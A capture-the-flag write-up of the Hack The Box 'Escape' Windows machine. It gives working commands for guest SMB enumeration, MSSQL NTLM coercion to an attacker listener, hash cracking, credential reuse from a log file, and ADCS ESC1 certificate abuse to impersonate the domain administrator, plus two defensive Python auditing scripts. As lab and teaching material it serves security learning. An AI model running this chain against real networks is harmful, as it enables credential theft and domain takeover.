Box Info
  • Name: Escape
  • OS: Windows
  • Difficulty: Medium
  • IP: 10.10.11.202
  • Machine Creator: Geiseric

Introduction

Escape is a medium-difficulty Windows machine on Hack The Box that revolves around Active Directory. The initial foothold is gained by finding credentials in a PDF file on an open SMB share. This access is then leveraged to connect to an MSSQL service, from which we capture and crack the NTLM hash of a service account. Lateral movement is achieved by discovering another user’s credentials in a log file. Finally, privilege escalation to Administrator is accomplished by exploiting a misconfiguration in Active Directory Certificate Services (ADCS), specifically the ESC1 vulnerability.

Scanning and Enumeration

Nmap Scan

We start with a basic Nmap scan to identify open ports and services running on the target machine.

sudo nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202
# Nmap 7.95 scan initiated Wed Jul  2 10:21:36 2025 as: /usr/lib/nmap/nmap -n -v -Pn -sC -sV -oN nmap.txt 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-02 21:59:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  2 10:23:22 2025 -- 1 IP address (1 host up) scanned in 105.64 seconds


We get the following information from the scan:

  • Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 1433, 3268, 3269, and 5985.
  • Services: DNS, Kerberos, MSRPC, NetBIOS, LDAP, MSSQL, and HTTPAPI.
  • Operating System: Microsoft Windows Server 2019.
  • Active Directory: Domain - sequel.htb and DC - dc.sequel.htb.

We now add the target to our /etc/hosts file for easier access:

10.10.11.202 dc.sequel.htb sequel.htb

Foothold

Looking at the Nmap scan we can confirm that this is a Windows machine with Active Directory services running.

SMB Enumeration

We have no credentials yet, so we will start by enumerating the SMB service using guest credentials.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p ''
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\a: (Guest)

We can see that we have access to the sequel.htb domain with guest credentials.

Enumerating users with nxc's --rid-brute option:

We find users:

  • 1000: sequel\DC$ (SidTypeUser)
  • 1101: sequel\DnsAdmins (SidTypeAlias)
  • 1102: sequel\DnsUpdateProxy (SidTypeGroup)
  • 1103: sequel\Tom.Henn (SidTypeUser)
  • 1104: sequel\Brandon.Brown (SidTypeUser)
  • 1105: sequel\Ryan.Cooper (SidTypeUser)
  • 1106: sequel\sql_svc (SidTypeUser)
  • 1107: sequel\James.Roberts (SidTypeUser)
  • 1108: sequel\Nicole.Thompson (SidTypeUser)
  • 1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)

We can now enumerate the shares available on the target machine.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'a' -p '' --shares
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\a: (Guest)
SMB         10.10.11.202    445    DC               [*] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON                        Logon server share
SMB         10.10.11.202    445    DC               Public          READ
SMB         10.10.11.202    445    DC               SYSVOL                          Logon server share

Public Share Enumeration

We can see that we have access to the Public share. Let’s enumerate it further using smbclient to see if we can find any interesting files.

kali@kali:~/boxes/Escape.htb$ smbclient //10.10.11.202/Public -U a%
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1475930 blocks available
smb: \>

We see one interesting file named SQL Server Procedures.pdf. Let’s download it to our local machine.

smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (57.1 KiloBytes/sec) (average 57.1 KiloBytes/sec)

We can open the PDF file to see if it contains any useful information. On page 2 we find:

This gives us a username PublicUser and a password Gu██████rCantWrite1.

We can now use these credentials to authenticate to the MSSQL service using nxc. (Remember, we need to use the --local-auth flag since we are not using domain credentials.)

kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth
MSSQL       10.10.11.202    1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.10.11.202    1433   DC               [+] DC\PublicUser:Gu██████rCantWrite1

We now use responder to capture the NTLM hash of the account under which the MSSQL service runs.

kali@kali:~/boxes/Escape.htb$ sudo responder -I tun0

Coercing MSSQL Service to capture NTLM Hash

We can now use nxc to coerce the MSSQL service to authenticate to our responder instance and capture the NTLM hash.

nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31
  • -u: Username to authenticate with.
  • -p: Password for the user.
  • --local-auth: Use local authentication instead of domain authentication.
  • -M mssql_coerce: Use the MSSQL coerce module to force the MSSQL service to authenticate to our responder instance.
  • -o LISTENER=10.10.16.31: Specify the IP address of our responder instance to listen for NTLM authentication requests.
kali@kali:~/boxes/Escape.htb$ nxc mssql 10.10.11.202 -u PublicUser -p Gu██████rCantWrite1 --local-auth -M mssql_coerce -o LISTENER=10.10.16.31
MSSQL       10.10.11.202    1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.10.11.202    1433   DC               [+] DC\PublicUser:Gu██████rCantWrite1
MSSQL_CO... 10.10.11.202    1433   DC               [*] Commands executed successfully, check the listener for results

On the responder terminal, we should see the NTLM hash being captured:

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:1477a8036251ce8d[...]
[*] Skipping previously captured hash for sequel\sql_svc
[*] Skipping previously captured hash for sequel\sql_svc

Cracking the NTLM Hash

We can now crack the captured NTLMv2 hash using hashcat or john.

Running the following on our host machine:

hashcat sql_svc.hash SecLists/Passwords/Leaked-Databases/rockyou.txt

We get the password for the sql_svc user as REGG██████ronnie.

Checking the password against the sql_svc user, we can confirm that it is correct.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\sql_svc:REGG██████ronnie

Checking the users in the Remote Management Users group:

kali@kali:~/boxes/Escape.htb$ nxc ldap 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie' --groups "Remote Management Users"
LDAP        10.10.11.202    389    DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
LDAPS       10.10.11.202    636    DC               [+] sequel.htb\sql_svc:REGG██████ronnie
LDAPS       10.10.11.202    636    DC               sql_svc
LDAPS       10.10.11.202    636    DC               Ryan.Cooper

We have 2 users: sql_svc and Ryan.Cooper.

Shell as sql_svc

We can now use WinRM to connect to the target machine as the sql_svc user.

kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u 'sql_svc' -p 'REGG██████ronnie'
        ▘▜      ▘
    █▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
    ▙▖▚▘▌▐▖  ▚▚▘▌▌▌▌ ▌▌▌  ▙▌▙▌
                          ▌ ▄▌ v1.1.2
[*] Connecting to 10.10.11.202:5985 as sql_svc
evil-winrm-py PS C:\Users\sql_svc\Documents>

There is no user.txt file on sql_svc's Desktop.

Lateral Movement

We are now logged in as the sql_svc user. We can check the privileges of this user using the whoami /priv command.

evil-winrm-py PS C:\Users\sql_svc\Documents> whoami /priv
USER INFORMATION

There is an error log file in the C:\SQLServer\Logs directory. Let's check it out.

evil-winrm-py PS C:\SQLServer\Logs> ls

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

Downloading the ERRORLOG.BAK file to our local machine:

evil-winrm-py PS C:\SQLServer\Logs> download ERRORLOG.BAK .
Downloading C:\SQLServer\Logs\ERRORLOG.BAK: 64.0kB [00:00, 376MB/s]
[+] File downloaded successfully and saved as: /home/kali/boxes/Escape.htb/ERRORLOG.BAK

Finding Credentials in the Error Log

In the ERRORLOG.BAK file, we find some interesting information, including failed login attempts and the usernames of the users who attempted to log in.

# <----SNIP---->
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMos██████'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
# <----SNIP---->


We can infer that the Ryan.Cooper user tried to log in, pressed Enter too early, and then typed the password NuclearMos██████ into the username field, which is why it was recorded in the log as a login name.
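The pattern above (a failed logon for a real account, immediately followed by a failed logon for an "account" that is really a password, from the same client) is something a defender can hunt for directly in the SQL Server ERRORLOG. The following script is an added example and not part of the original writeup: it parses 18456 "Logon failed" lines, compares the login name against the account list we got from rid-brute (plus the SQL logins the box exposes, an assumption), and flags unknown names, naming the likely owner when a known account failed from the same client a few seconds earlier. The sample log is constructed and the value Summer2022Placeholder stands in for the leaked password.

```python
from __future__ import annotations

import re
from datetime import datetime

# Constructed sample in the layout of a SQL Server ERRORLOG; this is NOT the
# box's real ERRORLOG.BAK, and 'Summer2022Placeholder' stands in for a password.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'Summer2022Placeholder'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:20.00 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:20.00 Logon       Logon failed for user 'sequel.htb\\Tom.Henn'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2022-11-18 13:44:01.10 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:44:01.10 Logon       Logon failed for user 'backup_admin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
"""

# One "Logon failed" line; the preceding "Error: 18456" line adds nothing we need.
LOGON_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?) "
    r"\[CLIENT: (?P<client>[^\]]+)\]$"
)

# Accounts expected as login names: the rid-brute results from the box plus
# the SQL logins it exposes ('publicuser', 'sa' are assumptions). Anything else is suspicious.
KNOWN_ACCOUNTS = {
    "dc$", "tom.henn", "brandon.brown", "ryan.cooper", "sql_svc",
    "james.roberts", "nicole.thompson", "publicuser", "sa",
}


def _short_name(user: str) -> str:
    """Strip a DOMAIN\\ prefix and lower-case: 'sequel.htb\\Ryan.Cooper' -> 'ryan.cooper'."""
    return user.rsplit("\\", 1)[-1].lower()


def parse_failed_logons(text: str) -> list[dict]:
    """Return every failed-logon event as a dict with ts, user, reason and client."""
    events = []
    for line in text.splitlines():
        m = LOGON_FAIL_RE.match(line.rstrip())
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append(ev)
    return events


def find_leaked_secrets(text: str, known_accounts=KNOWN_ACCOUNTS, window_s: float = 5.0) -> list[dict]:
    """Flag failed logons whose login name is not a known account.

    If the same client had a failed logon for a real account within window_s
    seconds just before, the unknown value was most likely a password typed
    into the username field, and that account is reported as the likely owner.
    """
    events = parse_failed_logons(text)
    findings = []
    for i, ev in enumerate(events):
        if _short_name(ev["user"]) in known_accounts:
            continue
        likely_owner = None
        for prev in reversed(events[:i]):
            if prev["client"] != ev["client"]:
                continue
            if _short_name(prev["user"]) in known_accounts and \
                    (ev["ts"] - prev["ts"]).total_seconds() <= window_s:
                likely_owner = _short_name(prev["user"])
            break  # only the most recent same-client event matters
        findings.append({
            "ts": ev["ts"].isoformat(sep=" "),
            "client": ev["client"],
            "user": ev["user"],
            "likely_owner": likely_owner,
            "note": "probable password in username field" if likely_owner else "unknown login name",
        })
    return findings


if __name__ == "__main__":
    for finding in find_leaked_secrets(SAMPLE_ERRORLOG):
        print(finding)
```

Run against a real ERRORLOG the account list would come from AD rather than a hard-coded set, and any hit with a likely_owner should trigger a password reset for that account: once a secret lands in a log that low-privileged users can read (as the sql_svc shell shows here), it has to be treated as compromised.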

Trying to login with the Ryan.Cooper user using the password NuclearMos██████:

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████'
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\Ryan.Cooper:NuclearMos██████

We can see that we have successfully authenticated as the Ryan.Cooper user.

Now, using WinRM, we can get a shell.

evil-winrm-py -i 10.10.11.202 -u ryan.cooper -p NuclearMos██████

Get user.txt:

evil-winrm-py PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
0c8cd01d32ba██████ba42d9410922d8

Privilege Escalation

ADCS is found to be running.

kali@kali:~/boxes/Escape.htb$ nxc smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMos██████' -M enum_ca
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\Ryan.Cooper:NuclearMos██████
ENUM_CA     10.10.11.202    445    DC               Active Directory Certificate Services Found.
ENUM_CA     10.10.11.202    445    DC               http://10.10.11.202/certsrv/certfnsh.asp

Enumerating ADCS Misconfigurations using certipy

We now enumerate misconfigurations in ADCS using certipy.

kali@kali:~/boxes/Escape.htb$ certipy find -u 'Ryan.Cooper' -p 'NuclearMos██████' -dc-ip 10.10.11.202 -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
# <----SNIP---->
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
# <----SNIP---->
    [+] User Enrollable Principals      : SEQUEL.HTB\Domain Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.


What is ESC1?

The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity in the certificate's SAN. This allows the attacker to impersonate any user, including administrators.

Key indicators in the output:

  • [!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. => This explicitly flags the vulnerability.
  • Enrollee Supplies Subject : True => This confirms the setting allowing attacker-defined subjects.
  • Client Authentication : True => This confirms the certificate can be used for logon.
  • [+] User Enrollable Principals : SEQUEL.HTB\Domain Users => This confirms the attacker has the necessary rights to request a certificate from this template.
  • Requires Manager Approval : False and Authorized Signatures Required : 0 => These confirm the absence of preventative issuance controls.
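The five indicators above are exactly the checks an auditor can script. The following is an added example (not the original writeup's code and not certipy's own implementation): it parses the "Key : Value" layout of certipy's text output, including the indented continuation lines of multi-valued fields, and applies the ESC1 conditions to each template. The sample text is constructed; its first template mirrors the UserAuthentication values shown above, while HardenedUser is an invented comparison template, and the set of principals treated as low-privileged is an assumption.

```python
from __future__ import annotations

import re

# Constructed excerpt in the layout of certipy's text output. The first template
# mirrors the values seen on the box; 'HardenedUser' is an invented comparison.
SAMPLE_FIND_OUTPUT = """\
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Enabled                             : True
    Client Authentication               : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    [+] User Enrollable Principals      : SEQUEL.HTB\\Domain Users
  1
    Template Name                       : HardenedUser
    Enabled                             : True
    Client Authentication               : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    [+] User Enrollable Principals      : SEQUEL.HTB\\Domain Admins
"""

# Groups whose membership every ordinary account has (assumed list).
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users", "everyone", "domain computers"}
MARKER_RE = re.compile(r"^\[[+!*-]\]\s*")   # strips the "[+] " / "[!] " prefixes


def _coerce(value: str):
    """Turn 'True'/'False'/'0' into Python values; leave everything else as text."""
    if value == "True":
        return True
    if value == "False":
        return False
    return int(value) if value.isdigit() else value


def parse_templates(text: str) -> list[dict]:
    """Parse 'Key : Value' blocks (with indented continuation lines) into one dict per template."""
    templates, current, last_key = [], None, None
    for raw in text.splitlines():
        line = MARKER_RE.sub("", raw.strip())
        if not line or line == "Certificate Templates":
            continue
        if line.isdigit() and raw.startswith("  ") and not raw.startswith("    "):
            current, last_key = {}, None      # "  0", "  1": start of a template block
            templates.append(current)
            continue
        if current is None:
            continue
        if ":" in line:
            key, _, value = line.partition(":")
            current[key.strip()] = _coerce(value.strip())
            last_key = key.strip()
        elif last_key is not None:
            prev = current[last_key]          # continuation of a multi-valued field
            current[last_key] = (prev if isinstance(prev, list) else [prev]) + [line]
    return templates


def _as_list(value) -> list:
    return [] if value is None else (value if isinstance(value, list) else [value])


def esc1_reasons(template: dict) -> list[str]:
    """Return the ESC1 conditions a template meets, or [] if any required condition is absent."""
    checks = [
        (template.get("Enabled") is True, "template is enabled"),
        (template.get("Enrollee Supplies Subject") is True, "enrollee supplies the subject (SAN is requester-chosen)"),
        (template.get("Client Authentication") is True or template.get("Any Purpose") is True,
         "template allows client authentication"),
        (template.get("Requires Manager Approval") is False, "no manager approval required"),
        (template.get("Authorized Signatures Required", 0) == 0, "no authorized signatures required"),
    ]
    reasons = []
    for ok, why in checks:
        if not ok:
            return []
        reasons.append(why)
    enrollers = [p.rsplit("\\", 1)[-1].lower() for p in _as_list(template.get("User Enrollable Principals"))]
    weak = sorted(set(enrollers) & LOW_PRIV_PRINCIPALS)
    if not weak:
        return []
    reasons.append("enrollable by low-privileged principals: " + ", ".join(weak))
    return reasons


def audit_esc1(text: str) -> dict[str, list[str]]:
    """Map each ESC1-vulnerable template name to the reasons it was flagged."""
    return {t.get("Template Name", "<unnamed>"): esc1_reasons(t)
            for t in parse_templates(text) if esc1_reasons(t)}


if __name__ == "__main__":
    for name, reasons in audit_esc1(SAMPLE_FIND_OUTPUT).items():
        print(name, "->", "; ".join(reasons))
```

Breaking any single condition removes the finding, which is also the remediation order of preference: clear Enrollee Supplies Subject so the CA builds the subject from the requester's AD object, or require manager approval or an authorized signature, and restrict enrollment rights to the group that actually needs the template. On the CA itself, audit events 4886 (request received) and 4887 (certificate issued) reveal requests whose SAN UPN names a different account than the requester.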

We request a certificate from the vulnerable template, supplying the UPN of a privileged target (the domain administrator) as the identity.

certipy req \
    -u 'Ryan.Cooper' -p 'NuclearMos██████' \
    -dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
    -ca 'sequel-DC-CA' -template 'UserAuthentication' \
    -upn 'administrator@sequel.htb'
  • -u: Username to authenticate with.
  • -p: Password for the user.
  • -dc-ip: IP address of the Domain Controller.
  • -target: Target domain controller.
  • -ca: Name of the certificate authority.
  • -template: Name of the certificate template to use.
  • -upn: User Principal Name (UPN) to inject into the certificate request.

Running the command, we get:

kali@kali:~/boxes/Escape.htb$ certipy req \
    -u 'Ryan.Cooper' -p 'NuclearMos██████' \
    -dc-ip '10.10.11.202' -target 'dc.sequel.htb' \
    -ca 'sequel-DC-CA' -template 'UserAuthentication' \
    -upn 'administrator@sequel.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

The certificate is saved as administrator.pfx, which contains both the certificate and the private key.

Using the obtained certificate to authenticate as the target.

certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
  • -pfx: Path to the PFX file containing the certificate and private key.
  • -dc-ip: IP address of the Domain Controller.

We try to authenticate using the certificate we just requested, but we encounter a clock skew error. This is likely because the time on our machine is not synchronized with the target machine.

kali@kali:~/boxes/Escape.htb$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information

We fix this by using:

sudo rdate -n 10.10.11.202

We can now re-attempt to authenticate using the administrator.pfx certificate we obtained earlier.

kali@kali:~/boxes/Escape.htb$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f██████51e5f5e17e1e9f3e58f4ee

Certipy successfully authenticated as the administrator user and retrieved the NT hash.

Using the NT hash, we can now connect to the target machine over WinRM.

kali@kali:~/boxes/Escape.htb$ evil-winrm-py -i 10.10.11.202 -u administrator -H a52f██████51e5f5e17e1e9f3e58f4ee
        ▘▜      ▘
    █▌▌▌▌▐ ▄▖▌▌▌▌▛▌▛▘▛▛▌▄▖▛▌▌▌
    ▙▖▚▘▌▐▖  ▚▚▘▌▌▌▌ ▌▌▌  ▙▌▙▌
                          ▌ ▄▌ v1.1.2
[*] Connecting to 10.10.11.202:5985 as administrator
evil-winrm-py PS C:\Users\Administrator\Documents>

We can now get the root flag:

evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
12bc39fe2fcfe7326██████1a3e0d208